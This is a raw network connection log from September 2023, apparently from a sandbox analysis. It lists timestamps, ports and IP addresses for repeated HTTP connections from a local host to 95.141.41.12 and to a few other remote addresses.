Sep 28, 2023 06:03:38.173016071 CEST	80	50113	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:38.177320957 CEST	80	50113	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:38.177627087 CEST	50113	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:38.294913054 CEST	50113	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:38.295254946 CEST	50114	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:38.491307974 CEST	80	50113	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:38.491466045 CEST	50113	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:38.494865894 CEST	80	50114	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:38.495085001 CEST	50114	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:38.495381117 CEST	50114	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:38.637145042 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:03:38.694735050 CEST	80	50114	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:38.696113110 CEST	80	50114	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:38.696167946 CEST	50114	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:38.810409069 CEST	50114	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:38.810858011 CEST	50116	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:39.009124994 CEST	80	50116	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:39.009413004 CEST	50116	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:39.009527922 CEST	50116	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:39.010185957 CEST	80	50114	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:39.010350943 CEST	50114	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:39.207828045 CEST	80	50116	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:39.213162899 CEST	80	50116	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:39.213449001 CEST	50116	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:39.326080084 CEST	50116	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:39.326539040 CEST	50117	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:39.510618925 CEST	80	50117	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:39.510904074 CEST	50117	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:39.511029959 CEST	50117	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:39.528887987 CEST	80	50116	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:39.528980017 CEST	50116	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:39.696027994 CEST	80	50117	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:39.702156067 CEST	80	50117	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:39.702256918 CEST	50117	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:39.810488939 CEST	50117	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:39.810930014 CEST	50118	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:39.840264082 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:03:39.996046066 CEST	80	50117	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:39.996336937 CEST	50117	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:40.008718967 CEST	80	50118	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:40.008841038 CEST	50118	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:40.009082079 CEST	50118	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:40.206923008 CEST	80	50118	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:40.211719036 CEST	80	50118	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:40.211838007 CEST	50118	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:40.326241016 CEST	50118	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:40.326600075 CEST	50120	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:40.524555922 CEST	80	50118	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:40.524621010 CEST	80	50120	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:40.524950981 CEST	50120	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:40.524960995 CEST	50118	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:40.525049925 CEST	50120	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:40.723186016 CEST	80	50120	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:40.727718115 CEST	80	50120	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:40.728009939 CEST	50120	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:40.841898918 CEST	50120	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:40.842165947 CEST	50121	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:41.036920071 CEST	80	50121	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:41.037250996 CEST	50121	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:41.037548065 CEST	50121	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:41.039704084 CEST	80	50120	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:41.039890051 CEST	50120	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:41.137056112 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:03:41.231570959 CEST	80	50121	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:41.233316898 CEST	80	50121	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:41.233625889 CEST	50121	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:41.345508099 CEST	50121	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:41.345957994 CEST	50122	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:41.536254883 CEST	80	50122	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:41.536515951 CEST	50122	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:41.536653996 CEST	50122	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:41.539751053 CEST	80	50121	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:41.539993048 CEST	50121	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:41.728025913 CEST	80	50122	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:41.733880997 CEST	80	50122	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:41.734108925 CEST	50122	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:41.841859102 CEST	50122	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:41.842334986 CEST	50124	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:42.046833038 CEST	80	50122	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:42.047024965 CEST	50122	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:42.049671888 CEST	80	50124	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:42.049854994 CEST	50124	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:42.050206900 CEST	50124	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:42.241657019 CEST	80	50124	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:42.245417118 CEST	80	50124	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:42.245635033 CEST	50124	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:42.381053925 CEST	50124	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:42.381597042 CEST	50125	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:42.572894096 CEST	80	50124	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:42.573226929 CEST	50124	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:42.578016043 CEST	80	50125	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:42.578253984 CEST	50125	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:42.581013918 CEST	50125	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:42.777859926 CEST	80	50125	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:42.781158924 CEST	80	50125	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:42.781558037 CEST	50125	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:43.149321079 CEST	50125	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:43.149857044 CEST	50127	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:43.334820986 CEST	80	50127	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:43.335222960 CEST	50127	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:43.335222960 CEST	50127	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:43.346173048 CEST	80	50125	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:43.346388102 CEST	50125	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:43.519592047 CEST	80	50127	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:43.526103020 CEST	80	50127	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:43.526458025 CEST	50127	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:43.637037992 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:03:43.638573885 CEST	50127	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:43.638911963 CEST	50128	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:43.822899103 CEST	80	50127	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:43.822978020 CEST	50127	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:43.835710049 CEST	80	50128	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:43.835968971 CEST	50128	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:43.836076975 CEST	50128	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:44.033196926 CEST	80	50128	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:44.037734032 CEST	80	50128	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:44.037828922 CEST	50128	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:44.154428959 CEST	50128	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:44.154861927 CEST	50129	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:44.348169088 CEST	80	50129	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:44.348402023 CEST	50129	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:44.348732948 CEST	50129	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:44.351169109 CEST	80	50128	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:44.351317883 CEST	50128	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:44.541678905 CEST	80	50129	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:44.543258905 CEST	80	50129	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:44.543442965 CEST	50129	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:44.654114008 CEST	50129	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:44.654319048 CEST	50130	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:44.850047112 CEST	80	50129	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:44.850099087 CEST	80	50130	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:44.850238085 CEST	50129	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:44.850405931 CEST	50130	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:44.850405931 CEST	50130	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:45.045448065 CEST	80	50130	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:45.046673059 CEST	80	50130	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:45.047076941 CEST	50130	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:45.154373884 CEST	50130	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:45.154880047 CEST	50132	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:45.350485086 CEST	80	50130	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:45.350703955 CEST	50130	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:45.355699062 CEST	80	50132	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:45.355899096 CEST	50132	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:45.356044054 CEST	50132	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:45.556524992 CEST	80	50132	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:45.560587883 CEST	80	50132	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:45.560956001 CEST	50132	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:45.670079947 CEST	50132	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:45.670423031 CEST	50133	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:45.868339062 CEST	80	50133	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:45.868585110 CEST	50133	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:45.868678093 CEST	50133	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:45.870475054 CEST	80	50132	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:45.870556116 CEST	50132	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:46.027663946 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:03:46.066648006 CEST	80	50133	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:46.071696043 CEST	80	50133	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:46.072001934 CEST	50133	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:46.105834961 CEST	49805	80	192.168.2.3	178.237.33.50
Sep 28, 2023 06:03:46.185615063 CEST	50133	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:46.185817003 CEST	50134	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:46.382766962 CEST	80	50134	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:46.382848978 CEST	50134	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:46.383045912 CEST	50134	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:46.383316994 CEST	80	50133	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:46.383491039 CEST	50133	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:46.496769905 CEST	2450	49801	81.19.131.36	192.168.2.3
Sep 28, 2023 06:03:46.501811028 CEST	49801	2450	192.168.2.3	81.19.131.36
Sep 28, 2023 06:03:46.580040932 CEST	80	50134	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:46.585059881 CEST	80	50134	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:46.585231066 CEST	50134	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:46.590156078 CEST	49805	80	192.168.2.3	178.237.33.50
Sep 28, 2023 06:03:46.701142073 CEST	50134	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:46.701407909 CEST	50137	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:46.712502956 CEST	2450	49801	81.19.131.36	192.168.2.3
Sep 28, 2023 06:03:46.898129940 CEST	80	50134	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:46.898287058 CEST	50134	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:46.905469894 CEST	80	50137	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:46.905555964 CEST	50137	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:46.905780077 CEST	50137	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:47.109935045 CEST	80	50137	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:47.135225058 CEST	80	50137	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:47.135530949 CEST	50137	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:47.248302937 CEST	50137	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:47.248459101 CEST	50138	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:47.446177006 CEST	80	50138	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:47.446374893 CEST	50138	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:47.446495056 CEST	50138	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:47.452974081 CEST	80	50137	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:47.453035116 CEST	50137	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:47.590161085 CEST	49805	80	192.168.2.3	178.237.33.50
Sep 28, 2023 06:03:47.643388987 CEST	80	50138	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:47.651704073 CEST	80	50138	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:47.652060032 CEST	50138	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:47.764223099 CEST	50138	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:47.764744043 CEST	50139	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:47.955619097 CEST	80	50139	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:47.955689907 CEST	50139	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:47.955879927 CEST	50139	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:47.961133003 CEST	80	50138	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:47.961227894 CEST	50138	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:48.147332907 CEST	80	50139	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:48.154459953 CEST	80	50139	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:48.154654026 CEST	50139	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:48.263747931 CEST	50139	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:48.263994932 CEST	50141	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:48.454929113 CEST	80	50139	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:48.455147028 CEST	50139	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:48.457649946 CEST	80	50141	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:48.457743883 CEST	50141	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:48.457916975 CEST	50141	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:48.651842117 CEST	80	50141	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:48.657435894 CEST	80	50141	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:48.657656908 CEST	50141	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:48.763787985 CEST	50141	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:48.764383078 CEST	50142	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:48.958000898 CEST	80	50141	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:48.958239079 CEST	50141	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:48.958296061 CEST	80	50142	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:48.958420038 CEST	50142	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:48.958585978 CEST	50142	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:49.152638912 CEST	80	50142	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:49.157121897 CEST	80	50142	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:49.157315016 CEST	50142	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:49.263621092 CEST	50142	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:49.263887882 CEST	50143	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:49.402657032 CEST	49805	80	192.168.2.3	178.237.33.50
Sep 28, 2023 06:03:49.451396942 CEST	80	50143	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:49.451611042 CEST	50143	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:49.451721907 CEST	50143	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:49.457952976 CEST	80	50142	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:49.458173990 CEST	50142	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:49.642741919 CEST	80	50143	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:49.649451971 CEST	80	50143	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:49.649645090 CEST	50143	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:49.763923883 CEST	50143	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:49.764508963 CEST	50145	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:49.951710939 CEST	80	50143	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:49.952047110 CEST	50143	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:49.961064100 CEST	80	50145	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:49.961358070 CEST	50145	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:49.961503029 CEST	50145	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:50.157938004 CEST	80	50145	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:50.161426067 CEST	80	50145	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:50.161695004 CEST	50145	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:50.263710022 CEST	50145	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:50.264247894 CEST	50146	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:50.452286959 CEST	80	50146	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:50.452611923 CEST	50146	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:50.452698946 CEST	50146	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:50.460385084 CEST	80	50145	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:50.460639954 CEST	50145	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:50.640453100 CEST	80	50146	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:50.645049095 CEST	80	50146	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:50.645256996 CEST	50146	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:50.747750044 CEST	50146	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:50.748049021 CEST	50147	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:50.935724020 CEST	80	50146	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:50.936094046 CEST	50146	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:50.955152035 CEST	80	50147	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:50.955405951 CEST	50147	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:50.955492020 CEST	50147	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:51.032408953 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:03:51.161339998 CEST	80	50147	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:51.165437937 CEST	80	50147	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:51.165826082 CEST	50147	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:51.279388905 CEST	50147	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:51.279649019 CEST	50149	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:51.466581106 CEST	80	50149	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:51.466680050 CEST	50149	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:51.466914892 CEST	50149	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:51.484195948 CEST	80	50147	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:51.484482050 CEST	50147	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:51.654071093 CEST	80	50149	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:51.658335924 CEST	80	50149	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:51.658405066 CEST	50149	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:51.764353037 CEST	50149	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:51.764975071 CEST	50150	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:51.951390982 CEST	80	50149	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:51.951551914 CEST	50149	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:51.959312916 CEST	80	50150	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:51.959646940 CEST	50150	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:51.959734917 CEST	50150	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:52.153728008 CEST	80	50150	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:52.154897928 CEST	80	50150	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:52.155292034 CEST	50150	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:52.263365030 CEST	50150	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:52.263698101 CEST	50151	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:52.457402945 CEST	80	50150	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:52.457871914 CEST	50150	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:52.463434935 CEST	80	50151	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:52.463622093 CEST	50151	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:52.463706970 CEST	50151	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:52.663736105 CEST	80	50151	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:52.669749022 CEST	80	50151	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:52.669965982 CEST	50151	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:52.779524088 CEST	50151	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:52.779833078 CEST	50153	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:52.902648926 CEST	49805	80	192.168.2.3	178.237.33.50
Sep 28, 2023 06:03:52.964310884 CEST	80	50153	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:52.964657068 CEST	50153	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:52.964740038 CEST	50153	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:52.980015039 CEST	80	50151	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:52.980401993 CEST	50151	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:53.149096966 CEST	80	50153	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:53.153615952 CEST	80	50153	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:53.153949022 CEST	50153	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:53.263607025 CEST	50153	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:53.263957024 CEST	50154	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:53.448584080 CEST	80	50153	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:53.448771954 CEST	50153	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:53.458859921 CEST	80	50154	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:53.459068060 CEST	50154	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:53.459290981 CEST	50154	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:53.654467106 CEST	80	50154	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:53.658987045 CEST	80	50154	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:53.659094095 CEST	50154	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:53.763463974 CEST	50154	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:53.763984919 CEST	50155	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:53.958722115 CEST	80	50154	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:53.959126949 CEST	50154	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:53.960473061 CEST	80	50155	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:53.960664988 CEST	50155	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:53.960896969 CEST	50155	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:54.157341003 CEST	80	50155	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:54.162070990 CEST	80	50155	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:54.162370920 CEST	50155	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:54.279200077 CEST	50155	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:54.279644966 CEST	50157	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:54.474304914 CEST	80	50157	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:54.474596024 CEST	50157	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:54.474708080 CEST	50157	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:54.476280928 CEST	80	50155	95.141.41.12	192.168.2.3
